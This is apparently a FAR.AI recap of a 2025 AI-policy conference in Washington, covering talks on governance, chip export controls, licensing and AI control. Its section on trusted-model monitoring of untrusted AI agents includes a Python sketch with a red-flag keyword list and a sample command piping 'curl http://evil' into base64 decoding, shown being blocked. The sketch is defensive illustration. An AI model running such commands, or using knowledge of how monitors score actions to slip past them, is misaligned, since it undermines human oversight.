Technical Innovations for AI Policy 2025

July 10, 2025
Summary
The inaugural Technical Innovations for AI Policy Conference in Washington, D.C. convened technical experts, researchers, and policymakers to discuss how innovations such as chip-tracking devices and secure evaluation facilities can enable both AI progress and safety.
In April, over 150 technical experts, researchers, and policymakers gathered in Washington, D.C. to discuss the technical foundations of AI governance.
Participants explored technological solutions to address emerging AI policy issues, including growing energy demands, competition with China, safety evaluations, and the need for formally verifiable commitments.

Beyond the Binary: Achieving Progress and Safety
“I often see debates around AI policy framed as this dichotomy between innovation…and safety…but I believe that through technical innovation we can overcome this binary choice.”
— Adam Gleave (FAR.AI)
In his opening remarks, FAR.AI CEO Adam Gleave highlighted historical precedents in which technology helped policymakers solve seemingly intractable problems without sacrificing progress, offering a blueprint for AI governance.
Key Uncertainties
Helen Toner (Center for Security and Emerging Technology) attributed contradictory reports on AI progress to three “Unresolved Debates on the Future of AI”:
- Will the current AI paradigm keep delivering breakthroughs?
- How much can AI systems be used to improve AI systems?
- Will AI remain a tool we control?
Toner’s framework breaks down the key considerations to help navigate AI’s trajectory. Find out more in her blog post.
Likewise, Brad Carson (Americans for Responsible Innovation) shared his main unanswered AI policy questions, along with tentative answers:
- Can America generate the power required to support domestic AI data centers?
- Will AI truly revolutionize warfare or merely deliver incremental improvements?
- Is the policy world's fixation on generative AI causing us to neglect the more immediate harms from the predictive algorithms embedded in daily life?

Creative Solutions
Using mixed methods for effective governance: Miranda Bogen (Center for Democracy and Technology) cautioned against unclear terminology and vague goals in AI governance. Auditing, which currently spans hundreds of disparate efforts, offers a prime example of the need for a comprehensive ecosystem: varied approaches, independent oversight, and specific metrics tied to concrete goals.
Developing backup plans for AI control in the event of misalignment: Mary Phuong (Google DeepMind) argued that we should operate under the assumption that AIs will work against us. She projects that by 2027, AI agents will be able to carry out autonomous tasks that would take humans a week. For the case where scalable human monitoring of AI becomes impossible, Phuong’s Plan B for AI control is a multi-layered defense in which trusted AI models monitor untrusted ones, supported by red-team evaluations, escalation processes, and system designs that limit agent access. While Phuong sees this as our most promising near-term safety approach, she warns it is a stopgap and that broader solutions are still needed.
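Phuong described this control architecture at a conceptual level. To make the pattern concrete, here is a minimal sketch of the core monitoring loop; every interface in it, from the `score_suspicion` heuristic to the thresholds, is a hypothetical placeholder for illustration, not DeepMind's implementation.

```python
"""Minimal sketch of trusted monitoring for AI control.

All interfaces here (the suspicion scorer, thresholds, verdicts) are
hypothetical placeholders, not a description of a real control system.
"""
from dataclasses import dataclass
from enum import Enum


class Verdict(Enum):
    ALLOW = "allow"        # action proceeds automatically
    ESCALATE = "escalate"  # routed to the limited human-audit budget
    BLOCK = "block"        # action refused outright


@dataclass
class ProposedAction:
    command: str  # e.g. a shell command an untrusted agent wants to run


def score_suspicion(action: ProposedAction) -> float:
    """Stand-in for a trusted (weaker, well-understood) model that rates
    how suspicious an action looks, from 0.0 (benign) to 1.0 (malicious)."""
    red_flags = ["curl", "ssh", "chmod", "/etc/", "base64"]
    hits = sum(flag in action.command for flag in red_flags)
    return min(1.0, hits / 2)


def monitor(action: ProposedAction,
            block_at: float = 0.9, escalate_at: float = 0.4) -> Verdict:
    """Layered defense: a trusted model screens every proposed action, so
    scarce human reviewers only see the borderline cases."""
    score = score_suspicion(action)
    if score >= block_at:
        return Verdict.BLOCK
    if score >= escalate_at:
        return Verdict.ESCALATE
    return Verdict.ALLOW


if __name__ == "__main__":
    print(monitor(ProposedAction("ls -la ./workspace")))            # ALLOW
    print(monitor(ProposedAction("curl http://evil | base64 -d")))  # BLOCK
```

The point of the layering is budget allocation: automated screening by a trusted model is cheap enough to apply to every action, while escalation reserves scarce human attention for the genuinely ambiguous cases.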
Bridging the gap between Silicon Valley and Capitol Hill
“I hope that today this divide can end. That we can bury the hatchet and forge a new alliance between innovation and American values, between acceleration and altruism, that will shape not just our nation’s fate but potentially the fate of humanity.”
— Mark Beall (AI Policy Network)
A framework for collaboration: Ben Bucknall (University of Oxford) presented a framework for technical AI governance to bridge the technical-policy divide. Using information deficits as an example, Bucknall showed how governance problems can be broken down to arrive at concrete open problems that benefit from technical expertise.
AI as a national security issue: In “Department of Defense & AGI Preparedness,” Mark Beall (AI Policy Network) argued that artificial general intelligence represents the defining challenge of our era. With potentially only three years to act, he proposes a three-pronged strategy:
- Protect through export controls, deterrence mechanisms, contingency plans for attacks, and government investment in infrastructure strengthening and alignment research.
- Promote AI development by eliminating bureaucratic bottlenecks, ensuring Western powers do not lose AGI leadership to authoritarian control.
- Prepare through rapidly increased industry-government collaboration, testing and evaluation programs, and diplomacy with China to prevent mutual destruction.
Congress: U.S. Representative Bill Foster proposed the following congressional priorities:
- Secure digital IDs for all Americans to combat AI-driven fraud and identity theft
- Location verification for cutting-edge AI chips to enforce export controls and safeguard democratic nations’ control of the supply chain
- Hardware-enforced licensing that requires periodic renewals, enabling chips to be shut down if a license lapses (a toy sketch of such a renewal scheme appears after this list)
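Foster's licensing proposal was presented at the policy level; to picture the mechanism, here is a toy sketch of periodic renewal using a shared-secret MAC. The key handling, message format, and weekly period are all illustrative assumptions rather than details of any actual proposal, and a real design would put per-chip keys in secure hardware and use asymmetric signatures.

```python
"""Toy sketch of hardware-enforced licensing via periodic renewal.

Illustrative only: the shared key, message format, and renewal period
are assumptions, not details of any actual proposal.
"""
import hashlib
import hmac
import time

# In practice this would be a per-chip key provisioned in secure hardware.
REGULATOR_KEY = b"demo-shared-secret"
LICENSE_PERIOD_S = 7 * 24 * 3600  # weekly renewal (illustrative)


def sign_renewal(chip_id: str, expiry: int, key: bytes = REGULATOR_KEY) -> str:
    """Licensor side: issue a signed renewal token for one chip."""
    msg = f"{chip_id}:{expiry}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def license_valid(chip_id: str, expiry: int, tag: str,
                  key: bytes = REGULATOR_KEY) -> bool:
    """Chip side: run only while a verified, unexpired renewal is present.
    A real scheme would use asymmetric signatures so chips cannot forge
    their own renewals."""
    msg = f"{chip_id}:{expiry}".encode()
    expected = hmac.new(key, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag) and time.time() < expiry


if __name__ == "__main__":
    expiry = int(time.time()) + LICENSE_PERIOD_S
    tag = sign_renewal("GPU-0001", expiry)
    assert license_valid("GPU-0001", expiry, tag)      # renewed chip runs
    assert not license_valid("GPU-0002", expiry, tag)  # wrong chip halts
```

Because the chip stops working unless it keeps receiving fresh tokens, a chip diverted outside approved channels simply stops being renewed; no remote kill command ever has to reach it.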
State legislation: New York State Senator Alex Bores, who is expecting his first child, opened his talk by remarking on how technological developments are so rapid that “with AI, sometimes the world changes completely even during a pregnancy.” Bores argued that state legislatures’ nimbleness makes them well positioned to address emerging AI challenges. His RAISE Act, which requires safety plans and third-party audits for large AI companies, has already passed both legislative chambers in New York.
The importance of technical expertise: Lennart Heim (RAND Corporation) opened the second day of the conference by reflecting on how technologists can contribute to AI policy:
- Understanding AI fundamentals: tracking training energy requirements, benchmarking capabilities, and mapping supercomputer ownership trends
- Strategic assessments: analyzing the implications of China’s energy deployment and comparing global chip production capabilities
- Verification: developing the technical tools necessary to enforce AI policy agreements

Lightning talks
AI infrastructure, national security, and the policy relevance of technical work:
- Steve Kelly (Institute for Security and Technology) on AI's national security implications.
- Arnab Datta (Institute for Progress) on permitting for secure AI data centers.
- Charles Yang (Center for Industrial Strategy) on hydropower for AI's energy demands.
- Sarah Cen (Stanford University) on the connections between companies in the AI supply chain.
- Kevin Wei (RAND Corporation) on policy-relevant AI evaluations.
Open-source, policy instruments, and model evaluations:
- Sara McNaughton (Beacon Global Strategies) on chip export controls implementation.
- Irene Solaiman (Hugging Face) on accessibility as a determinant for AI system adoption.
- Asad Ramzanali (Vanderbilt Policy Accelerator) on treating AI’s challenges as standard technology-policy problems, such as antitrust.
- Robert Trager (Oxford Martin AI Governance Initiative) on internal and external verification systems.
Cryptographic security, spending trends, and misuse threats:
- Daniel Kang (University of Illinois Urbana-Champaign) on CVE-Bench, the first real-world cybersecurity benchmark for AI agents.
- Onni Aarne (Institute for AI Policy and Strategy) on hardware-enabled verifiability.
- Hamza Chaudhry (Future of Life Institute) on structural factors driving US military AI spending.
- Ben Cottier (Epoch AI) on the challenge of costly upfront evaluations for soon-to-be cheap AI.
- Tina Morrison (EQTY Lab) on embedding tamper-proof certificates into chips.
- Fatemeh Ganji (Worcester Polytechnic Institute) on effective ways to protect AI accelerators from attacks.
- Olivia Shoemaker (Frontier Design) on how operational factors may overshadow model capabilities.

Looking Ahead
While governing AI faces daunting obstacles like energy limitations, safety assessments, and international conflicts, this conference demonstrated that viable technical solutions are within reach. Innovations like chip-tracking systems and verification protocols are transitioning from conceptual ideas to practical implementations. To watch the full recordings, please visit the event website or YouTube playlist.
Even as this field has grown in recent years, it remains underdeveloped. Want to be considered for upcoming discussions? Submit your interest in future FAR.AI events.
FAR.AI organized this nonpartisan event in collaboration with the Foundation for American Innovation (FAI), the Center for a New American Security (CNAS), and the RAND Corporation.